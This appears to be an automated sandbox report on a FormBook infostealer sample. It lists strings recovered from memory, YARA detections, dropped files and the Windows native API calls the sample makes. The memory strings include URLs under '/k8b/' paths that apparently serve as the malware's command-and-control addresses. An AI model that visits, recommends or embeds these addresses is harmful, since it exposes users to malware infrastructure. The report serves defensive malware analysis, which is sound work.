          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.p229pbfc9frm4.netReferer:
          Source: vyac9eSGFdsBaas.exe, 00000000.00000003.368281987.00000000052FB000.00000004.00000001.sdmp, vyac9eSGFdsBaas.exe, 00000000.00000002.394699051.00000000063F2000.00000004.00000001.sdmp, vyac9eSGFdsBaas.exe, 00000000.00000003.364937278.00000000052FB000.00000004.00000001.sdmp, vyac9eSGFdsBaas.exe, 00000000.00000003.364884389.00000000052FB000.00000004.00000001.sdmp, vyac9eSGFdsBaas.exe, 00000000.00000003.364894639.00000000052FB000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.415825218.000000000C230000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: vyac9eSGFdsBaas.exe, 00000000.00000002.394699051.00000000063F2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.415825218.000000000C230000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.salestalentforhire.com
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.salestalentforhire.com/k8b/
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.salestalentforhire.com/k8b/www.infi88.com
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.salestalentforhire.comReferer:
          Source: vyac9eSGFdsBaas.exe, 00000000.00000002.394699051.00000000063F2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.415825218.000000000C230000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000005.00000000.415825218.000000000C230000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: vyac9eSGFdsBaas.exe, 00000000.00000002.394699051.00000000063F2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.415825218.000000000C230000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: vyac9eSGFdsBaas.exe, 00000000.00000002.394699051.00000000063F2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.415825218.000000000C230000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.xn--ucko5bzcwf3b2c.com
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.xn--ucko5bzcwf3b2c.com/k8b/
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.xn--ucko5bzcwf3b2c.com/k8b/www.mensajera-radio.online
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.xn--ucko5bzcwf3b2c.comReferer:
          Source: vyac9eSGFdsBaas.exe, 00000000.00000002.394699051.00000000063F2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.415825218.000000000C230000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: vyac9eSGFdsBaas.exe, 00000000.00000003.366937932.00000000052E4000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cnQl
          Source: vyac9eSGFdsBaas.exe, 00000000.00000003.366861134.00000000052E4000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cna
          Source: NETSTAT.EXE, 0000000C.00000002.630991650.0000000002F38000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srfken&display=windesktop&theme=win7&lc=1033&redirect_uri=htt

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000004.00000002.432585496.0000000001150000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.390879561.0000000003F08000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.632020204.00000000036A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.631947208.0000000003660000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.631039100.0000000002F70000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.433229610.0000000001180000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.432161870.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 4.2.vyac9eSGFdsBaas.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vyac9eSGFdsBaas.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Detected FormBook malwareShow sources
          Source: C:\Windows\SysWOW64\NETSTAT.EXEDropped file: C:\Users\user\AppData\Roaming\L6725004\L67logri.iniJump to dropped file
          Source: C:\Windows\SysWOW64\NETSTAT.EXEDropped file: C:\Users\user\AppData\Roaming\L6725004\L67logrv.iniJump to dropped file
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000004.00000002.432585496.0000000001150000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.432585496.0000000001150000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.390879561.0000000003F08000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.390879561.0000000003F08000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000C.00000002.632020204.00000000036A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000002.632020204.00000000036A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000C.00000002.631947208.0000000003660000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000002.631947208.0000000003660000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000C.00000002.631039100.0000000002F70000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000002.631039100.0000000002F70000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.433229610.0000000001180000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.433229610.0000000001180000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.432161870.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.432161870.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.vyac9eSGFdsBaas.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.vyac9eSGFdsBaas.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.vyac9eSGFdsBaas.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.vyac9eSGFdsBaas.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 0_2_052B0BEE NtQuerySystemInformation,0_2_052B0BEE
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 0_2_052B0BB3 NtQuerySystemInformation,0_2_052B0BB3
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_00419C90 NtCreateFile,4_2_00419C90
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_00419D40 NtReadFile,4_2_00419D40
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_00419DC0 NtClose,4_2_00419DC0
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_00419E70 NtAllocateVirtualMemory,4_2_00419E70
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_00419D3A NtReadFile,4_2_00419D3A
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_01729910 NtAdjustPrivilegesToken,LdrInitializeThunk,4_2_01729910
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_017299A0 NtCreateSection,LdrInitializeThunk,4_2_017299A0
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_01729860 NtQuerySystemInformation,LdrInitializeThunk,4_2_01729860
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_01729840 NtDelayExecution,LdrInitializeThunk,4_2_01729840
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_017298F0 NtReadVirtualMemory,LdrInitializeThunk,4_2_017298F0
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_01729A50 NtCreateFile,LdrInitializeThunk,4_2_01729A50
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_01729A20 NtResumeThread,LdrInitializeThunk,4_2_01729A20
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_01729A00 NtProtectVirtualMemory,LdrInitializeThunk,4_2_01729A00
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_01729540 NtReadFile,LdrInitializeThunk,4_2_01729540
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_017295D0 NtClose,LdrInitializeThunk,4_2_017295D0
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_01729710 NtQueryInformationToken,LdrInitializeThunk,4_2_01729710
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_017297A0 NtUnmapViewOfSection,LdrInitializeThunk,4_2_017297A0
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_01729780 NtMapViewOfSection,LdrInitializeThunk,4_2_01729780
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_01729660 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_01729660
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_017296E0 NtFreeVirtualMemory,LdrInitializeThunk,4_2_017296E0
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_01729950 NtQueueApcThread,4_2_01729950
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_017299D0 NtCreateProcessEx,4_2_017299D0
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_0172B040 NtSuspendThread,4_2_0172B040
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_01729820 NtEnumerateKey,4_2_01729820
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_017298A0 NtWriteVirtualMemory,4_2_017298A0
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_01729B00 NtSetValueKey,4_2_01729B00
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_0172A3B0 NtGetContextThread,4_2_0172A3B0
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_01729A10 NtQuerySection,4_2_01729A10
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_01729A80 NtOpenDirectoryObject,4_2_01729A80
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_01729560 NtWriteFile,4_2_01729560
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_0172AD30 NtSetContextThread,4_2_0172AD30
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_01729520 NtWaitForSingleObject,4_2_01729520
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_017295F0 NtQueryInformationFile,4_2_017295F0
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_0172A770 NtOpenThread,4_2_0172A770
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_01729770 NtSetInformationFile,4_2_01729770
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_01729760 NtOpenProcess,4_2_01729760
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_01729730 NtQueryVirtualMemory,4_2_01729730
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_0172A710 NtOpenProcessToken,4_2_0172A710
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_01729FE0 NtCreateMutant,4_2_01729FE0
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_01729670 NtQueryInformationProcess,4_2_01729670
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_01729650 NtQueryValueKey,4_2_01729650
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_01729610 NtEnumerateValueKey,4_2_01729610
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_017296D0 NtCreateKey,4_2_017296D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_038A9A50 NtCreateFile,LdrInitializeThunk,12_2_038A9A50
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_038A99A0 NtCreateSection,LdrInitializeThunk,12_2_038A99A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_038A9910 NtAdjustPrivilegesToken,LdrInitializeThunk,12_2_038A9910
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_038A9840 NtDelayExecution,LdrInitializeThunk,12_2_038A9840
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_038A9860 NtQuerySystemInformation,LdrInitializeThunk,12_2_038A9860
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_038A9780 NtMapViewOfSection,LdrInitializeThunk,12_2_038A9780
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_038A9FE0 NtCreateMutant,LdrInitializeThunk,12_2_038A9FE0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_038A9710 NtQueryInformationToken,LdrInitializeThunk,12_2_038A9710
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_038A9770 NtSetInformationFile,LdrInitializeThunk,12_2_038A9770
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_038A96D0 NtCreateKey,LdrInitializeThunk,12_2_038A96D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_038A96E0 NtFreeVirtualMemory,LdrInitializeThunk,12_2_038A96E0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_038A9610 NtEnumerateValueKey,LdrInitializeThunk,12_2_038A9610
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_038A9650 NtQueryValueKey,LdrInitializeThunk,12_2_038A9650
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_038A9660 NtAllocateVirtualMemory,LdrInitializeThunk,12_2_038A9660
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_038A95D0 NtClose,LdrInitializeThunk,12_2_038A95D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_038A9540 NtReadFile,LdrInitializeThunk,12_2_038A9540
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_038A9560 NtWriteFile,LdrInitializeThunk,12_2_038A9560
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_038AA3B0 NtGetContextThread,12_2_038AA3B0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_038A9B00 NtSetValueKey,12_2_038A9B00
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_038A9A80 NtOpenDirectoryObject,12_2_038A9A80
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_038A9A00 NtProtectVirtualMemory,12_2_038A9A00
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_038A9A10 NtQuerySection,12_2_038A9A10
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_038A9A20 NtResumeThread,12_2_038A9A20
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_038A99D0 NtCreateProcessEx,12_2_038A99D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_038A9950 NtQueueApcThread,12_2_038A9950
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_038A98A0 NtWriteVirtualMemory,12_2_038A98A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_038A98F0 NtReadVirtualMemory,12_2_038A98F0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_038A9820 NtEnumerateKey,12_2_038A9820
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_038AB040 NtSuspendThread,12_2_038AB040
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_038A97A0 NtUnmapViewOfSection,12_2_038A97A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_038AA710 NtOpenProcessToken,12_2_038AA710
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_038A9730 NtQueryVirtualMemory,12_2_038A9730
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_038A9760 NtOpenProcess,12_2_038A9760
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_038AA770 NtOpenThread,12_2_038AA770
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_038A9670 NtQueryInformationProcess,12_2_038A9670
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_038A95F0 NtQueryInformationFile,12_2_038A95F0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_038A9520 NtWaitForSingleObject,12_2_038A9520
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_038AAD30 NtSetContextThread,12_2_038AAD30
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_02F89E70 NtAllocateVirtualMemory,12_2_02F89E70
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_02F89C90 NtCreateFile,12_2_02F89C90
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_02F89DC0 NtClose,12_2_02F89DC0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_02F89D40 NtReadFile,12_2_02F89D40
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_02F89D3A NtReadFile,12_2_02F89D3A
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 0_2_007422390_2_00742239
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 0_2_02B116800_2_02B11680
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 0_2_02B13ED80_2_02B13ED8
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 0_2_02B156400_2_02B15640
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 0_2_02B11B900_2_02B11B90
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 0_2_02B147D80_2_02B147D8
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 0_2_02B137100_2_02B13710
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 0_2_02B1A8380_2_02B1A838
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 0_2_02B12C000_2_02B12C00
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 0_2_02B179780_2_02B17978
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 0_2_02B1C1600_2_02B1C160
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 0_2_02B1AAB00_2_02B1AAB0
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 0_2_02B136960_2_02B13696
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 0_2_02B13EC80_2_02B13EC8
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 0_2_02B1562B0_2_02B1562B
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 0_2_02B162000_2_02B16200
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 0_2_02B16E700_2_02B16E70
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 0_2_02B16E620_2_02B16E62
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 0_2_02B177B80_2_02B177B8
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 0_2_02B11B800_2_02B11B80
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 0_2_02B173F80_2_02B173F8
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 0_2_02B12BFB0_2_02B12BFB
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 0_2_02B1C7E00_2_02B1C7E0
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 0_2_02B173EA0_2_02B173EA
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 0_2_02B163D80_2_02B163D8
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 0_2_02B177C80_2_02B177C8
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 0_2_02B163CB0_2_02B163CB
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 0_2_02B147CA0_2_02B147CA
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 0_2_02B1E7000_2_02B1E700
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 0_2_02B1D3780_2_02B1D378
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 0_2_02B1837B0_2_02B1837B
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 0_2_02B1437A0_2_02B1437A
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 0_2_02B1CB600_2_02B1CB60
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 0_2_02B1B8280_2_02B1B828
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 0_2_02B184000_2_02B18400
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 0_2_02B15C020_2_02B15C02
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 0_2_02B160080_2_02B16008
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 0_2_02B175BB0_2_02B175BB
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 0_2_02B1CDA80_2_02B1CDA8
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 0_2_02B175C80_2_02B175C8
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 0_2_02B179680_2_02B17968
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 0_2_07C400700_2_07C40070
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 0_2_07C400060_2_07C40006
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 0_2_07C4001D0_2_07C4001D
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 3_2_001822393_2_00182239
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_004010304_2_00401030
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_0041E8904_2_0041E890
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_0041E1FD4_2_0041E1FD
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_0041D38A4_2_0041D38A
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_0041E52A4_2_0041E52A
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_00402D8A4_2_00402D8A
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_00402D904_2_00402D90
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_00409E2C4_2_00409E2C
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_00409E304_2_00409E30
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_0041DF994_2_0041DF99
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_00402FB04_2_00402FB0
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_00C322394_2_00C32239
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_017041204_2_01704120
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_016EF9004_2_016EF900
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_017099BF4_2_017099BF
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_0170A8304_2_0170A830
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_017BE8244_2_017BE824
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_017A10024_2_017A1002
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_017B28EC4_2_017B28EC
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_017120A04_2_017120A0
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_017B20A84_2_017B20A8
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_016FB0904_2_016FB090
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_0170AB404_2_0170AB40
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_0178CB4F4_2_0178CB4F
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_017B2B284_2_017B2B28
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_017A231B4_2_017A231B
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_0170A3094_2_0170A309
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_017923E34_2_017923E3
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_017A03DA4_2_017A03DA
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_017ADBD24_2_017ADBD2
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_0171ABD84_2_0171ABD8
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_0171EBB04_2_0171EBB0
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_0170EB9A4_2_0170EB9A
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_0171138B4_2_0171138B
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_0170B2364_2_0170B236
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_0179FA2B4_2_0179FA2B
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_017A4AEF4_2_017A4AEF
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_017B22AE4_2_017B22AE
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_017B1D554_2_017B1D55
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_016E0D204_2_016E0D20
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4_2_017B2D074_2_017B2D07
